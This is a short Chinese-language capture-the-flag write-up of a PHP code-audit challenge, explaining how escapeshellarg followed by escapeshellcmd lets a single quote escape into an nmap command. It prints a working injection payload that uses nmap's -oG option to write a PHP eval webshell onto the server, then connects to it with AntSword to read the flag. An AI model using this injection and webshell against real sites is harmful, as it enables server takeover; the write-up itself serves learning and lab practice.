环境开起来,事php代码审计题(恼),先来看前几行代码
if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
$_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR'];
}
目前感觉没啥用,就是平常的获取ip地址,先跳过
来看看下面这几行
$host = $_GET['host'];
$host = escapeshellarg($host);
$host = escapeshellcmd($host);
escapeshellarg();escapeshellcmd();这个两个命令没见过,查一下,发现了这一篇文章,地址我贴下面了
https://paper.seebug.org/164/
escapeshellarg这个命令的作用有三
1.确保用户只传递一个参数给命令
2.用户不能指定更多的参数一个
3.用户不能执行不同的命令
因为mail的代码的问题,我先把mail的代码的内容贴出来
if (force_extra_parameters) {
extra_cmd = php_escape_shell_cmd(force_extra_parameters);
} else if (extra_cmd) {
extra_cmd = php_escape_shell_cmd(extra_cmd);
}
if (php_mail(to_r, subject_r, message, headers_trimmed, extra_cmd TSRMLS_CC)) {
RETVAL_TRUE;
} else {
RETVAL_FALSE;
}
也就是我们输入的命令其实是被处理了两次的,嗯?嘛,啊!我们现在来模拟一下我们输入的命令会受到什么样的处理:
- 传入的参数是:172.17.0.2’ -v -d a=1
- 经过escapeshellarg处理后变成了’172.17.0.2’‘’ -v -d a=1’,即先对单引号转义,再用单引号将左右两部分括起来从而起到连接的作用。
- 经过escapeshellcmd处理后变成’172.17.0.2’\‘’ -v -d a=1’,这是因为escapeshellcmd对\以及最后那个不配对儿的引号进行了转义
- 最后执行的命令是curl ‘172.17.0.2’\‘’ -v -d a=1’,由于中间的\被解释为\而不再是转义字符,所以后面的’没有被转义,与再后面的’配对儿成了一个空白连接符。所以可以简化为curl 172.17.0.2\ -v -d a=1’,即向172.17.0.2\发起请求,POST 数据为a=1’。
有那个感觉了吧
“有危险快移动”
最下面还使用了echo system("nmap -T5 -sT -Pn --host-timeout 2 -F ".$host);
这就有机可乘了,又是nmap命令,那么就可以用nmap搞事了,网上查一下发现-oG命令可以用
那肯定传一句话木马咯?host=' <?php @eval($_POST["114514"]);?> -oG tshe.php '
这是什么,失忆木马?欸,传一下
然后蚁剑连接看一下目录就有flag了